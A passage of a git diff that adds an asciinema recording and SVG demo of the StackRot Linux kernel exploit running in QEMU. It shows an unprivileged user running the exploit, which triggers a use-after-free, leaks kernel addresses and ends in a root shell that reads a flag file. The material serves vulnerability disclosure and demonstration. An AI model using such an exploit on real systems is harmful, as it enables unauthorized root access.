"12\\012j"] +[18.056542, "o", "p\\012\\"] +[18.056576, "o", "012\\0"] +[18.056607, "o", "12\\012k\\0"] +[18.056636, "o", "12f\\0"] +[18.056672, "o", "12g\\012"] +[18.057036, "o", "\\012\\012\\012\\012\\012\\012om\\012ti\\012\\012\\012\\012f\\012\\012u\\012\\012g\\012\\012o\\012"] +[18.057193, "o", "y\\012p\\012\\012\\012c\\012q\\012\\012\\012"] +[18.057261, "o", "\\012cf\\012\\012p\\"] +[18.057317, "o", "012t\\012\\012"] +[18.057376, "o", 
"\\012\\012\\012\\"] +[18.05743, "o", "012\\012i\\012"] +[18.057481, "o", "g\\012\\012rdu\\"] +[18.05753, "o", "012scq\\012"] +[18.057587, "o", "\\012etbq\\012"] +[18.057642, "o", "\\012\\012\\012"] +[18.057697, "o", "\\012\r\r\nb"] +[18.057751, "o", "c808e0000100c"] +[18.057781, "o", "d0-ffff"] +[18.057809, "o", "ffff r"] +[18.05784, "o", "wxs 00"] +[18.057876, "o", "000000 "] +[18.058009, "o", "00:00 0 "] +[18.058066, "o", " [vdso]\r\r\n"] +[18.058124, "o", "ffffffffff60"] +[18.058184, "o", "0000-ffffffff"] +[18.058235, "o", "ff601000 --"] +[18.058288, "o", "xp 00000000 "] +[18.058342, "o", "00:00 0 "] +[18.058392, "o", " "] +[18.058445, "o", " [vsyscal"] +[18.0585, "o", "l]\r\r\n\r\r\n"] +[18.058579, "o", "\u001b[32m[+] Pa"] +[18.058639, "o", "rsed from memory "] +[18.058696, "o", "maps: word "] +[18.058754, "o", "bc808e000010"] +[18.058809, "o", "0cd0, word "] +[18.058866, "o", "ffffffff"] +[18.058916, "o", "\r\r\n"] +[18.060371, "o", "\u001b[32m[+] Leak"] +[18.060401, "o", "ed c"] +[18.060429, "o", "ode ad"] +[18.060456, "o", "dress: "] +[18.060565, "o", "ffffffffbc800cd0\r"] +[18.060622, "o", "\r\n"] +[18.261768, "o", "\u001b[0m[ ] Trying w"] +[18.262006, "o", "ith free_t"] +[18.262138, "o", "iming_"] +[18.262262, "o", "msec"] +[18.262406, "o", "=50"] +[18.263165, "o", "\r\r\n"] +[18.32683, "o", "\u001b[0m[ ] UAF state update: \"free\" has been comple"] +[18.326887, "o", "ted\r\r\n"] +[18.351991, "o", "\u001b[0m[ ] UAF state update: \"use\" has been complet"] +[18.352041, "o", "ed\r\r\n"] +[18.377781, "o", "\\012\\012\\012\\012f\\012t\\012y\\012z\\012ae\\012\\012\\012\\012\\012\\012\\012\\012v\\0"] +[18.377829, "o", "12\\012a\\012\\012yo"] +[18.377859, "o", "\\012\\0"] +[18.377892, "o", "12\\012\\0"] +[18.377931, "o", "12\\012k"] +[18.377963, "o", "\\012\\012"] +[18.377996, "o", "o\\012\\01"] +[18.378027, "o", "2\\012h"] +[18.378058, "o", "\\012j\\0"] +[18.378088, "o", "12\\012"] +[18.378122, "o", "\\012\\012"] +[18.378156, "o", "ia\\012"] +[18.378196, "o", 
"\\012\\012j"] +[18.37823, "o", "p\\012\\0"] +[18.37826, "o", "12\\012\\0"] +[18.378289, "o", "12k\\012f"] +[18.378318, "o", "\\012g"] +[18.378348, "o", "\\012\\01"] +[18.378382, "o", "2\\012"] +[18.378418, "o", "\\012\\012\\"] +[18.378452, "o", "012\\012"] +[18.378483, "o", "om\\012ti"] +[18.378511, "o", "\\012\\01"] +[18.378539, "o", "2\\012\\"] +[18.378965, "o", "012f\\012\\012u\\012\\012g\\012\\012o\\012y\\012p\\012\\012\\012c\\012q\\012\\012\\012\\012cf\\012\\012p\\012t"] +[18.379156, "o", "\\012\\012\\012\\012\\012\\012\\012i\\012g\\012\\012rd"] +[18.37922, "o", "u\\012scq\\012\\01"] +[18.379277, "o", "2etbq\\012\\01"] +[18.379336, "o", "2\\012\\012\\012"] +[18.379394, "o", "\r\r\nffff8"] +[18.379453, "o", "9410bc63d58-0"] +[18.37951, "o", "000008c ---s 0"] +[18.379567, "o", "0000000 00:0"] +[18.379624, "o", "0 0 \r\r\nff"] +[18.379681, "o", "ffffffff600000"] +[18.379738, "o", "-ffffffffff6"] +[18.379791, "o", "01000 --xp "] +[18.379846, "o", "00000000 00:"] +[18.379899, "o", "00 0 "] +[18.379955, "o", " [vs"] +[18.380014, "o", "yscall]\r\r\n"] +[18.380071, "o", "\r\r\n\u001b[32m[+"] +[18.380125, "o", "] Parsed fr"] +[18.380184, "o", "om memory maps"] +[18.380238, "o", ": word f"] +[18.380269, "o", "fff8941"] +[18.3803, "o", "0bc63d58"] +[18.380332, "o", ", wor"] +[18.38037, "o", "d 8c"] +[18.380406, "o", "\r\r\n"] +[18.382534, "o", "\u001b[32m[+] Leake"] +[18.38257, "o", "d heap a"] +[18.3826, "o", "ddress:"] +[18.382629, "o", " "] +[18.382663, "o", "ffff89410b"] +[18.382691, "o", "c63d58"] +[18.382723, "o", "\r\r\n"] +[18.606885, "o", "\u001b[0m[ ] Trying with free_timing_msec=50\r\r\n"] +[18.664931, "o", "\u001b[0m[ ] UAF state update: \"free\" has been completed\r\r\n"] +[18.687037, "o", "\u001b[35m[*] Got root! 
Run /tmp/exp/as_root.sh\r\r\n\u001b[0m\u0000"] +[18.689255, "o", "\r\r\n/bin/sh\r\r\n"] +[18.689297, "o", "/bin/sh: can't access tty"] +[18.689322, "o", "; job"] +[18.689473, "o", " control turned off\r\r\n"] +[18.68951, "o", "sh: getcwd:"] +[18.689626, "o", " File"] +[18.689673, "o", "name too long\r\r\n(unknown) "] +[18.689786, "o", "# \u001b[6n"] +[20.08424, "o", "c"] +[20.284157, "o", "d"] +[20.360471, "o", " "] +[20.535501, "o", "/"] +[20.759812, "o", "\r\r\n"] +[20.760362, "o", "/ # \u001b[6n"] +[21.856448, "o", "w"] +[22.294736, "o", "h"] +[22.447266, "o", "o"] +[22.706371, "o", "a"] +[22.836824, "o", "m"] +[22.978726, "o", "i"] +[23.180178, "o", "\r\r\n"] +[23.180905, "o", "root\r\r\n"] +[23.181274, "o", "/ # \u001b[6n"] +[24.399818, "o", "l"] +[24.447417, "o", "s"] +[24.532067, "o", " "] +[24.858831, "o", "/"] +[24.982703, "o", "r"] +[25.117271, "o", "o"] +[25.226519, "o", "o"] +[25.283216, "o", "t"] +[25.373648, "o", " "] +[25.45593, "o", "-"] +[25.568748, "o", "a"] +[25.658969, "o", "l"] +[25.874866, "o", "\r\r\n"] +[25.875636, "o", "total 4\r\r\n"] +[25.875971, "o", "drwx"] +[25.876153, "o", "r-x--- 2 root 0"] +[25.876465, "o", " 60 J"] +[25.876748, "o", "ul 23 2023 \u001b[1;34m"] +[25.877015, "o", ".\u001b[m\r\r\ndrw"] +[25.877242, "o", "xr-xr-x 12 r"] +[25.877418, "o", "oot 0 "] +[25.877511, "o", " "] +[25.877581, "o", " "] +[25.877655, "o", "280 J"] +[25.877744, "o", "ul "] +[25.877819, "o", "23 20"] +[25.877894, "o", "23 \u001b["] +[25.877973, "o", "1;34m"] +[25.878049, "o", "..\u001b["] +[25.878119, "o", "m\r"] +[25.878192, "o", "\r\n"] +[25.878277, "o", "----"] +[25.878371, "o", "------"] +[25.878449, "o", " 1 "] +[25.878525, "o", "root"] +[25.878616, "o", " "] +[25.878683, "o", "0 "] +[25.878749, "o", " "] +[25.878826, "o", " "] +[25.878904, "o", " 44 "] +[25.878974, "o", "Jul "] +[25.879041, "o", "23 2"] +[25.879105, "o", "023 \u001b"] +[25.879167, "o", "[0;0"] +[25.879229, "o", "mfla"] +[25.879299, "o", "g\u001b[m"] +[25.880437, "o", "\r\r\n/ # 
\u001b[6n"] +[26.542948, "o", "c"] +[26.616409, "o", "a"] +[26.789251, "o", "t"] +[26.854233, "o", " "] +[27.043488, "o", "/"] +[27.178086, "o", "r"] +[27.298468, "o", "o"] +[27.422848, "o", "o"] +[27.482141, "o", "t"] +[27.81754, "o", "/"] +[27.926386, "o", "f"] +[28.058793, "o", "l"] +[28.140338, "o", "a"] +[28.270765, "o", "g"] +[28.739999, "o", "\r\r\n"] +[28.74056, "o", "flag{StackR0"] +[28.740701, "o", "t_hApp"] +[28.74081, "o", "y-eXp1"] +[28.741282, "o", "oit_53"] +[28.741513, "o", "103579874132}\r\r\n"] +[28.741702, "o", "/ # \u001b[6"] +[28.741805, "o", "n"] +[30.042318, "o", "\r\r\n"] +[30.042479, "o", "\r\r\npowerof"] +[30.042976, "o", "f -f\r\r\n"] +[30.06729, "o", "[ 27.390502] rebo"] +[30.067348, "o", "ot: Power down\r"] +[30.0676, "o", "\r\n"] +[30.177692, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"] +[30.257145, "o", "\u001b]0;ruihan@localhost: ~/projects/StackRot/exp\u0007"] +[30.27367, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[0m\u001b[49m\u001b[39m\r\n\r\n\u001b[A\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[49m \u001b[0m\u001b[49m\u001b[38;5;31m \u001b[1m\u001b[38;5;31m\u001b[38;5;39m~\u001b[0m\u001b[38;5;39m\u001b[49m\u001b[38;5;31m/projects/\u001b[1m\u001b[38;5;31m\u001b[38;5;39mStackRot\u001b[0m\u001b[38;5;39m\u001b[49m\u001b[38;5;31m/\u001b[1m\u001b[38;5;31m\u001b[38;5;39mexp\u001b[0m\u001b[38;5;39m\u001b[49m\u001b[38;5;31m\u001b[0m\u001b[38;5;31m\u001b[49m\u001b[38;5;31m\u001b[0m\u001b[38;5;31m\u001b[49m \u001b[0m\u001b[38;5;31m\u001b[49m\u001b[38;5;178m\u001b[39mon \u001b[0m\u001b[49m\u001b[38;5;76m\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[38;5;178m \u001b[38;5;76m master \u001b[38;5;178m!2\u001b[0m\u001b[38;5;178m\u001b[49m\u001b[38;5;178m\u001b[0m\u001b[38;5;178m\u001b[49m\u001b[30m \u001b[0m\u001b[30m\u001b[49m\u001b[39m\u001b[38;5;244m······················································································\u001b[0m\u001b[38;5;244m\u001b[49m\u001b[30m 
\u001b[0m\u001b[30m\u001b[49m\u001b[38;5;101m\u001b[39mtook \u001b[0m\u001b[49m\u001b[38;5;101m 28s\u001b[0m\u001b[38;5;101m\u001b[49m\u001b[38;5;101m\u001b[0m\u001b[38;5;101m\u001b[49m\u001b[38;5;101m\u001b[0m\u001b[38;5;101m\u001b[49m\u001b[38;5;66m \u001b[39mat \u001b[0m\u001b[49m\u001b[38;5;66m 09:47:09 AM\u001b[0m\u001b[38;5;66m\u001b[49m\u001b[38;5;66m\u001b[0m\u001b[38;5;66m\u001b[49m\u001b[38;5;66m\u001b[0m\u001b[38;5;66m\u001b[49m\u001b[39m\r\n\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[49m\u001b[38;5;76m❯\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[38;5;76m\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[30m\u001b[0m\u001b[30m\u001b[49m\u001b[39m \u001b[0m\u001b[49m\u001b[39m\u001b[K\u001b[?1h"] +[30.273977, "o", "\u001b[?2004h"] +[31.09336, "o", "\u001b[?2004l\r\r\n"] diff --git a/pic/demo.svg b/pic/demo.svg new file mode 100644 index 0000000..2e037ab --- /dev/null +++ b/pic/demo.svg 
@@ -0,0 +1 @@ +~/projects/StackRot/exponmaster!2·································································································at09:46:38AM-m3G-smp2-enable-kvm\-virtfslocal,path=../env/exp,mount_tag=exp,security_model=none\-nographic-no-rebootqemu-system-x86_64\-kernel../env/bzImage_upstream_6.1.25\-initrd../env/initramfs.cpio.gz\-append"quietconsole=ttyS0panic_on_warn=1"\SeaBIOS(versionArchLinux1.16.3-1-1)iPXE(http://ipxe.org)00:03.0C900PCI2.10PnPPMM+BEFD3180+BEF33180C900mount-tdevtmpfsnone/devmount-tprocnone/procmount-tsysfsnonemount-tsysfsnone/sysmount-ttmpfsnone/tmpmmkdir/tmp/expmount-t9pexp/tmp/expsuguest/tmp/exp/exploit.shexec/bin/sh/bin/sh:can'taccesstty;jobcontrolturnedoff/$/$whoamiguest/$ls/$ls/root/$ls/root-alls:can'topen'/root':Permissionls:can'topen'/root':Permissiondeniedtotal0/$cat/$cat/root/flagcat:can'topen'/root/flag':Permissiondenied/$/tmp/exp/exploit[][]Creating[]Creatingaverydeepf[]Creatingaverydeepfil[]Creatingaverydeepfile:0/65536[]Creatingaverydeepfile[]Creatingaverydeepfile:4096/65536[]Creatingave[]Creatingavery[]Creatingaveryd[]Creatingaveryde[]Creatingaverydeep[]Creatingaverydeepfile:8192/65536[]Creatinga[]Creatingav[]Creatingaverydee[]Creatingaverydeepfile:12288/65536[]Creatingaver[]Creatingaverydeepfile:[]Creatingaverydeepfile:16384/65536[]Creatingaverydeepfile:20480/65536[]Creatingaverydeepfi[]Creatingaverydeepfile:24576/65536[]Creatingaverydeepfile:28672/65536[]Creatingaverydeepfile:32768/65536[]Creatingaverydeepfile:36864/65536[]Creatingaverydeepfile:40960/65536[]Creatingaverydeepfile:45056/65536[]Creatingaverydeepfile:49152/65536[]Creatingaverydeepfile:53248/65536[]Creatingaverydeepfile:57344/65536[]Creatingaverydeepfile:61440/65536[+]Created[+]Createdthe[+]Createdthedeep[+]Createdthedeepfile[]Tryingw[]Tryingwithfree_timing_[]Tryingwithfree_timing_msec=0[]UAFstateupdate:"free"hasbeencomple[]UAFstateupdate:"free"hasbeencompleted[]UAFstateupdate:"use"hasbeencompleted\012\012\012\012f\012t\012y\012z\012ae\012\012\012\01
2\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\011\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\010\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01\0007e000-0007f000rw-p0000000000:0000007f000-00081000rw-p0000000000:000ffffffffff600000ffffffffff600000-ffffffffff601000--xp0000000000:000ffffffffff600000-ffffffffff601000--xp0000000000:000[vsyscall][-]Unsuccessfulexploittrial:Memorymapscontainthefourthline[+]Healcheckpassed:"Use"happensafter"free"[]Tryingwithfree_timing_msec=50\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01jbc808e0000100cd0-ffffffffrwxs0000000000:000[vdso][+]Parsedfrommemorymaps:wordbc808e0000100cd0,wordffffffff[+]Leakedcodeaddress:ffffffffbc800cd0ffff89410bc63d58-0000008c---s0000000000:000[+]Parsedfrommemorymaps:wordffff89410bc63d58,word8c[+]Leakedheapaddress:[+]Leakedheapaddress:ffff89410bc63d58[*]Gotroot!Run/tmp/exp/as_root.sh/bin/shsh:getcwd:Filenametoolong(unknown)#cd(unknown)#cd//#/#whoamiroot/#ls/#ls/root/#ls/root-altotal4drwxr-x---2root060Jul232023.drwxr-xr-x12root0drwxr-xr-x12root0280Jul232023drwxr-xr-x12root0280Jul232023..----------1root----------1root0----------1root044Jul232023----------1root044Jul232023flag/#cat/#cat/root/flagflag{StackR0t_hAppy-eXp1oit_53103579874132}poweroff-f[27.390502]reboot:Powerdown~/projects/StackRot/exponmaster!2······················································································took28sat09:47:09AMqqqemu-system-x86_64\-m3G-smp2-enable-kvm\-kernel../env/bzImag
e_upstream_6.1.25\-initrd../env/initramfs.cpio.gz\-append"quietconsole=ttyS0panic_on_warn=1"\-virtfslocal,path=../env/exp,mount_tag=exp,security_model=none\-nographic-no-rebootqemu-system-x86_64\-kernel../env/bzImage_upstream_6.1.25\-initrd../env/initramfs.cpio.gz\-append"quietconsole=ttyS0panic_on_warn=1"\SeaBIOSSeaBIOS(verSeaBIOS(versionSeaBIOS(versionArchLinuxSeaBIOS(versionArchLinux1.1SeaBIOS(versionArchLinux1.16.SeaBIOS(versionArchLinux1.16.3-SeaBIOS(versionArchLinux1.16.3-1-SeaBIOS(versionArchLinux1.16.3-1-1iPXEiPXE(http://ipxeiPXE(http://ipxe.org)00:03.iPXE(http://ipxe.org)00:03.0C900PCI2iPXE(http://ipxe.org)00:03.0C900PCI2.10iPXE(http://ipxe.org)00:03.0C900PCI2.10PniPXE(http://ipxe.org)00:03.0C900PCI2.10PnPPMiPXE(http://ipxe.org)00:03.0C900PCI2.10PnPPMM+BEFD318iPXE(http://ipxe.org)00:03.0C900PCI2.10PnPPMM+BEFD3180+BEF3318iPXE(http://ipxe.org)00:03.0C900PCI2.10PnPPMM+BEFD3180+BEF33180C90PPressPressCtrPressCtrl-PressCtrl-BtPressCtrl-BtoPressCtrl-BtoconPressCtrl-BtoconfiPressCtrl-BtoconfigurPressCtrl-BtoconfigurePressCtrl-BtoconfigureiPXPressCtrl-BtoconfigureiPXEPressCtrl-BtoconfigureiPXE(PPressCtrl-BtoconfigureiPXE(PCIPressCtrl-BtoconfigureiPXE(PCI00:PressCtrl-BtoconfigureiPXE(PCI00:03PressCtrl-BtoconfigureiPXE(PCI00:03.0)PressCtrl-BtoconfigureiPXE(PCI00:03.0)..PressCtrl-BtoconfigureiPXE(PCI00:03.0)...ssCtrl-BtoconfigureiPXE(PCI00:03.0)...Ctrl-BtoconfigureiPXE(PCI00:03.0)...rl-BtoconfigureiPXE(PCI00:03.0)...BtoconfigureiPXE(PCI00:03.0)...toconfigureiPXE(PCI00:03.0)...configureiPXE(PCI00:03.0)...nfigureiPXE(PCI00:03.0)...igureiPXE(PCI00:03.0)...reiPXE(PCI00:03.0)...iPXE(PCI00:03.0)...E(PCI00:03.0)...(PCI00:03.0)...CI00:03.0)...00:03.0)...:03.0)...3.0)...)....BBootBootinBootingBootingfroBootingfromRBootingfromROMBootingfromROM..mount-tprocnomount-tsysfsmount-tsysfsnmount-tsysfsnomount-tsysfsnone/symount-ttmpmount-ttmpfsmount-ttmpfsnmount-ttmpfsnomount-ttmpfsnone/tmmkmkdirmoumount-t9pexpmount-t9pexp/tmp/esusugusuguest/tmp/esuguest/tmp/exp/exeexec/bin//bin/s/bin/s
h:can'tac/bin/sh:can'taccesstty;jo/bin/sh:can'taccesstty;jobcontroltu/$w/$wh/$who/$whoa/$whoam/$l/$ls//$ls/r/$ls/ro/$ls/roo/$ls/root-/$ls/root-als:can'tols:can'topen'ls:can'topen'/root':Permls:can'topen'/root':Permisls:can'topen'/root':Permissils:can'topen'/root':Permissiondeni/$c/$ca/$cat//$cat/r/$cat/ro/$cat/roo/$cat/root/$cat/root//$cat/root/f/$cat/root/fl/$cat/root/flacat:can'topencat:can'topen'/root/flag':cat:can'topen'/root/flag':Pe/$//$/t/$/tm/$/tmp/$/tmp//$/tmp/e/$/tmp/ex/$/tmp/exp/$/tmp/exp//$/tmp/exp/e/$/tmp/exp/ex/$/tmp/exp/exp/$/tmp/exp/expl/$/tmp/exp/explo/$/tmp/exp/exploi[]Creatin[]Creatingaverydeepfile:0/[]Creatingaverydeepfile:16384/6[[]Creat[]Creatingaverydeepfile:24576/6553[]Creatingaverydeepfile:28672/[]Cr[]Creatingaverydeepfile:36864[]Creatingaverydeepfile:409[]Creatingaverydeepfile:4096[]Creatingaverydeepfile:40960[]Creatingaverydeepfile:40960/[]Creatingaverydeepfile:40960/6[]Creatingaverydeepfile:40960/6553[]Creatingaverydeepfile:53248/65[+]Creat[+]Create[+]Createdth[+]Createdthed[+]Createdthedeepfi[+]Createdthedeepfil[]Tryingwit[]Tryingwithfree_timing_msec=[]UAF[]UAFstat[]UAFstate[]UAFstateupdate:"[]UAFstateupdate:"free"[]UAFstateupdate:"free"has[]UAFstateupdate:"free"hasbee[]UAFstateupdate:"free"hasbeenco\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\01\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\01\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01p\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo
\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01m\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01s00070007e0000007e000-000007e000-0007f000rw-p0007e000-0007f000rw-p000000000007e000-0007f000rw-p000000000000007f000-00080007f000-00081000007f000-00081000rw-p0007f000-00081000rw-p00000000007f000-00081000rw-p0000000000:ffffffffffffffffff6ffffffffff600000-fffffffffff600000-ffffffffff6010ffffffffff600000-ffffffffff60100ffffffffff600000-ffffffffff601000--xp00000ffffffffff600000-ffffffffff601000--xp000000000ffffffffff600000-ffffffffff601000--xp0000000000:000[vsysca[-]Unsucc[-]Unsucce[-]Unsuccessfulexp[-]Unsuccessfulexploittr[-]Unsuccessfulexploittrial:Mem[-]Unsuccessfulexploittrial:Memorymaps[-]Unsuccessfulexploittrial:Memorymapscontai[-]Unsuccessfulexploittrial:Memorymapscontainthefo[+][+]H[+]Healcheckpa[+]Healcheckpasse[+]Healcheckpassed:"Use"[+]Healcheckpassed:"Use"happensafter"\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012iabbc808e0000100cbc808e0000100cd0-f
fffbc808e0000100cd0-ffffffffrbc808e0000100cd0-ffffffffrwxs00bc808e0000100cd0-ffffffffrwxs00000000bc808e0000100cd0-ffffffffrwxs0000000000:000ffffffffff60ffffffffff600000-ffffffffffffffffff600000-ffffffffff601000--ffffffffff600000-ffffffffff601000--xp00000000ffffffffff600000-ffffffffff601000--xp0000000000:000[vsyscal[+]Pa[+]Parsedfrommemory[+]Parsedfrommemorymaps:word[+]Parsedfrommemorymaps:wordbc808e000010[+]Parsedfrommemorymaps:wordbc808e0000100cd0,word[+]Leak[+]Leakedc[+]Leakedcodead[+]Leakedcodeaddress:[]Tryingwithfree_t[]Tryingwithfree_timing_msec[]UAFstateupdate:"use"hasbeencomplet\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\0\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\0\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\0\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\01\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\0\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012
\012o\012\012\012h\012j\012\012\012\012ia\01f\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01g\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01i\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01t\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01dffff8ffff89410bc63d58-0ffff89410bc63d58-0000008c---s0ffff89410bc63d58-0000008c---s0000000000:0ffffffffffff600000-ffffffffff6ffffffffff600000-ffffffffff601000--xpffffffffff600000-ffffffffff601000--xp0000000000:ffffffffff600000-ffffffffff601000--xp0000000000:000[vs[+[+]Parsedfr[+]Parsedfrommemorymaps[+]Parsedfrommemorymaps:wordf[+]Parsedfrommemorymaps:wordffff8941[+]Parsedfrommemorymaps:wordffff89410bc63d58[+]Parsedfrommemorymaps:wordffff89410bc63d58,wor[+]Leake[+]Leakedheapa[+]Leakedheapaddress:ffff89410b/bin/sh:can'taccesstty/bin/sh:can'taccesstty;jobsh:getcwd:sh:getcwd:File(unknown)(unknown)#(unknown)#c/#w/#wh/#who/#whoa/#whoam/#l/#ls//#ls/r/#ls/ro/#ls/roo/#ls/root-/#ls/root-adrwxdrwxr-x---2root0drwxr-x---2root060Jdrwxr-x---2root060Jul232023drwdrwxr-xr-x12rdrwxr-xr-x12root0280Jdrwxr-xr-x12root0280Juldrwxr-xr-x12root0280Jul2320------------------------1----------1root044----------1root044Jul----------1root044Jul232----------1root044Jul232023fla/#c/#ca/#cat//#cat/r/#cat/ro/#cat/roo/#cat/root/#cat/root//#cat/root/f/#cat/root/fl/#cat/root/flaflag{StackR0flag{StackR0t_hAppflag{StackR0t_hAppy-eXp1flag{StackR0t_hAppy-eXp1oit_53powerof[27.390502]rebo \ No newline at end of file